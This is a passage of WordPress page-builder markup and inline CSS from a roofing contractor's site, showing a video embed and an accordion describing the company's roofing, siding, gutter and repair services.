.block-5516cc91-fc54-44d5-993c-edc1d1a493ed.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-5516cc91-fc54-44d5-993c-edc1d1a493ed.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-5516cc91-fc54-44d5-993c-edc1d1a493ed .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-5516cc91-fc54-44d5-993c-edc1d1a493ed .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-5516cc91-fc54-44d5-993c-edc1d1a493ed.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-5516cc91-fc54-44d5-993c-edc1d1a493ed .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-5516cc91-fc54-44d5-993c-edc1d1a493ed.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-5516cc91-fc54-44d5-993c-edc1d1a493ed .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-5516cc91-fc54-44d5-993c-edc1d1a493ed.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"815c0a72-4711-47d6-af09-0eeed0cfc3f5\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":64,\"subHeadingTitleFontSizeMobile\":34,\"subHeadingTitleFontSizeTablet\":50,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-815c0a72-4711-47d6-af09-0eeed0cfc3f5 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-815c0a72-4711-47d6-af09-0eeed0cfc3f5 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-815c0a72-4711-47d6-af09-0eeed0cfc3f5 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-815c0a72-4711-47d6-af09-0eeed0cfc3f5 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-815c0a72-4711-47d6-af09-0eeed0cfc3f5 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-815c0a72-4711-47d6-af09-0eeed0cfc3f5 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-815c0a72-4711-47d6-af09-0eeed0cfc3f5 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-815c0a72-4711-47d6-af09-0eeed0cfc3f5 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-815c0a72-4711-47d6-af09-0eeed0cfc3f5 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-815c0a72-4711-47d6-af09-0eeed0cfc3f5 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-815c0a72-4711-47d6-af09-0eeed0cfc3f5 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-815c0a72-4711-47d6-af09-0eeed0cfc3f5 .responsive-heading-desc-text {\n font-size: 64px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-815c0a72-4711-47d6-af09-0eeed0cfc3f5 .responsive-heading-desc-text {\n font-size: 50px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-815c0a72-4711-47d6-af09-0eeed0cfc3f5 .responsive-heading-desc-text {\n font-size: 34px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-815c0a72-4711-47d6-af09-0eeed0cfc3f5 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-815c0a72-4711-47d6-af09-0eeed0cfc3f5 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-815c0a72-4711-47d6-af09-0eeed0cfc3f5 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-815c0a72-4711-47d6-af09-0eeed0cfc3f5\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We’re Providing Premium<br>Roofing Services</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/video-popup {\"videoLink\":\"https://www.youtube.com/embed/7er8Dz9JaO0\",\"vidheight\":300,\"opacity\":0,\"counterId\":\"a73594bf-7628-4abc-946c-adb3a1a7bfd9\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-a73594bf-7628-4abc-946c-adb3a1a7bfd9 .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: 300px; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-a73594bf-7628-4abc-946c-adb3a1a7bfd9 .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-a73594bf-7628-4abc-946c-adb3a1a7bfd9 .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n</style><div class=\"skt-blocks-block-a73594bf-7628-4abc-946c-adb3a1a7bfd9 skt-blocks-video-popup alignundefined\"><div class=\"skt-blocks-video-popup__wrapper\" data-video=\"7er8Dz9JaO0\" style=\"border-width:1px;border-style:none;box-shadow:0px 0px   undefined \"><a href=\"#\" class=\"skt-blocks-video-popup__overlay\"></a><span class=\"skt-blocks-video-popup__play-button\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"30\" height=\"30\" viewBox=\"0 0 256 320\" style=\"width:30px;height:30px;fill:#ffffff;opacity:1\"><path d=\"M0 0v320l256-160L0 0z\"></path></svg></span></div></div>\n<!-- /wp:skt-blocks/video-popup --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"76638827-2f2d-4e3a-b70d-cdf7aad55adf\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":98,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-8\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-8 skt-blocks-block-section-outer-wrap block-76638827-2f2d-4e3a-b70d-cdf7aad55adf background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-76638827-2f2d-4e3a-b70d-cdf7aad55adf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-76638827-2f2d-4e3a-b70d-cdf7aad55adf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-76638827-2f2d-4e3a-b70d-cdf7aad55adf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 98px; padding-left: 10px; padding-right: 10px; }\n}\n .block-76638827-2f2d-4e3a-b70d-cdf7aad55adf.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-76638827-2f2d-4e3a-b70d-cdf7aad55adf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-76638827-2f2d-4e3a-b70d-cdf7aad55adf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-76638827-2f2d-4e3a-b70d-cdf7aad55adf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-76638827-2f2d-4e3a-b70d-cdf7aad55adf.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-76638827-2f2d-4e3a-b70d-cdf7aad55adf .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-76638827-2f2d-4e3a-b70d-cdf7aad55adf .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-76638827-2f2d-4e3a-b70d-cdf7aad55adf.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-76638827-2f2d-4e3a-b70d-cdf7aad55adf .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-76638827-2f2d-4e3a-b70d-cdf7aad55adf.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-76638827-2f2d-4e3a-b70d-cdf7aad55adf .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-76638827-2f2d-4e3a-b70d-cdf7aad55adf.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"f87195c3-b83c-40de-b305-a9ae888de629\"} -->\n<style type=\"text/css\"> .block-f87195c3-b83c-40de-b305-a9ae888de629 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-f87195c3-b83c-40de-b305-a9ae888de629 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f87195c3-b83c-40de-b305-a9ae888de629 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f87195c3-b83c-40de-b305-a9ae888de629 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-f87195c3-b83c-40de-b305-a9ae888de629 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-f87195c3-b83c-40de-b305-a9ae888de629 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f87195c3-b83c-40de-b305-a9ae888de629 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-f87195c3-b83c-40de-b305-a9ae888de629 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"rightPadding\":80,\"rightPaddingTablet\":30,\"rightPaddingMobile\":0,\"blockId\":\"4f0ee9dc-f38c-4d59-97a7-c09c4dddf1c8\"} -->\n<style type=\"text/css\"> .block-4f0ee9dc-f38c-4d59-97a7-c09c4dddf1c8 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-4f0ee9dc-f38c-4d59-97a7-c09c4dddf1c8 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-4f0ee9dc-f38c-4d59-97a7-c09c4dddf1c8 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 80px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-4f0ee9dc-f38c-4d59-97a7-c09c4dddf1c8 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-4f0ee9dc-f38c-4d59-97a7-c09c4dddf1c8 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-4f0ee9dc-f38c-4d59-97a7-c09c4dddf1c8\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"81a0102a-3bf3-4eab-ad48-cc9ed202a6dc\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"subheadSpacingTablet\":35,\"subheadSpacingMobile\":25,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-81a0102a-3bf3-4eab-ad48-cc9ed202a6dc .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-81a0102a-3bf3-4eab-ad48-cc9ed202a6dc .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-81a0102a-3bf3-4eab-ad48-cc9ed202a6dc .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-81a0102a-3bf3-4eab-ad48-cc9ed202a6dc .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-81a0102a-3bf3-4eab-ad48-cc9ed202a6dc .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-81a0102a-3bf3-4eab-ad48-cc9ed202a6dc .responsive-heading-desc-text {\n margin-bottom: 35px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-81a0102a-3bf3-4eab-ad48-cc9ed202a6dc .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-81a0102a-3bf3-4eab-ad48-cc9ed202a6dc .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-81a0102a-3bf3-4eab-ad48-cc9ed202a6dc .responsive-heading-desc-text {\n margin-bottom: 25px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-81a0102a-3bf3-4eab-ad48-cc9ed202a6dc .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-81a0102a-3bf3-4eab-ad48-cc9ed202a6dc .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-81a0102a-3bf3-4eab-ad48-cc9ed202a6dc .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-81a0102a-3bf3-4eab-ad48-cc9ed202a6dc .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-81a0102a-3bf3-4eab-ad48-cc9ed202a6dc .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-81a0102a-3bf3-4eab-ad48-cc9ed202a6dc {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-81a0102a-3bf3-4eab-ad48-cc9ed202a6dc {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-81a0102a-3bf3-4eab-ad48-cc9ed202a6dc {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-81a0102a-3bf3-4eab-ad48-cc9ed202a6dc\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Guaranteed</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/accordion {\"block_id\":\"82806091\",\"schema\":\"{\\u0022@context\\u0022:\\u0022https://schema.org\\u0022,\\u0022@type\\u0022:\\u0022AccordionPage\\u0022,\\u0022mainEntity\\u0022:[{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Roofing\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022With Mike or Justin on every job you can be sure to receive quality that cannot be beat.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Siding\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Gutters\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022As a vital role in the overall protection of your home call today for a free estimate on new seamless aluminum gutters by Dunrite.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Repairs\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.\\u0022}}]}\"} -->\n<div class=\"wp-block-skt-blocks-accordion skt-blocks-accordion__outer-wrap skt-blocks-block-82806091 skt-blocks-accordion-icon-row skt-blocks-accordion-layout-accordion skt-blocks-accordion-expand-first-false skt-blocks-accordion-inactive-other-true skt-blocks-accordion-equal-height\"><style type=\"text/css\">.skt-blocks-block-82806091 {\nmargin-top: undefinedpx;margin-bottom: undefinedpx;margin-left: undefinedpx;margin-right: undefinedpx;}\n.skt-blocks-block-82806091 .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;margin-right: 10px;}\n.skt-blocks-block-82806091 .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;fill: #656565;margin-right: 10px;}\n.skt-blocks-block-82806091 .skt-blocks-icon svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-82806091 .skt-blocks-icon-active svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-82806091 .skt-blocks-accordion-item__outer-wrap{\nmargin-bottom: 10px;}\n.skt-blocks-block-82806091 .skt-blocks-accordion__wrap.skt-blocks-buttons-layout-wrap{\ngrid-column-gap: 10px;grid-row-gap: 10px;}\n.skt-blocks-block-82806091 .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-82806091 .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-82806091 .skt-blocks-accordion-item:hover .skt-blocks-icon svg{\nfill: #656565;}\n.skt-blocks-block-82806091 .skt-blocks-accordion-item .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles{\nflex-direction: row;}\n.skt-blocks-block-82806091 .skt-blocks-accordion-titles-button .skt-blocks-title{\nfont-size: undefinedpx;}\n.skt-blocks-block-82806091 .skt-blocks-accordion-item .skt-blocks-accordion-content{\nbackground-image: linear-gradient(100deg,rgba(238, 238, 238, 100),rgba(238, 238, 238, 1));font-size: undefinedpx;}\n.skt-blocks-block-82806091 .skt-blocks-accordion-item__outer-wrap .skt-blocks-accordion-content {\ndisplay: none;}\n@media only screen and (max-width: 1024px) {\n.skt-blocks-block-82806091 .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-82806091 .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-82806091 .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-82806091 .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n@media only screen and (max-width: 768px) {\n.skt-blocks-block-82806091 .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-82806091 .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-82806091 .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-82806091 .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n</style><style type=\"text/css\"> .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: #FFFFFF; }\n .skt-blocks-accordion-item-active .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: undefined; }\n</style><div class=\"skt-blocks-accordion__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/accordion-item {\"block_id\":\"42d2b943\",\"title\":\"Roofing\",\"content\":\"With Mike or Justin on every job you can be sure to receive quality that cannot be beat.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-42d2b943 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Roofing</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>With Mike or Justin on every job you can be sure to receive quality that cannot be beat.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"ca8d2c25\",\"title\":\"Siding\",\"content\":\"Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-ca8d2c25 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Siding</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"a57e0714\",\"title\":\"Gutters\",\"content\":\"As a vital role in the overall protection of your home call today for a free estimate on new seamless aluminum gutters by Dunrite.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-a57e0714 gb-renovation-tab\" 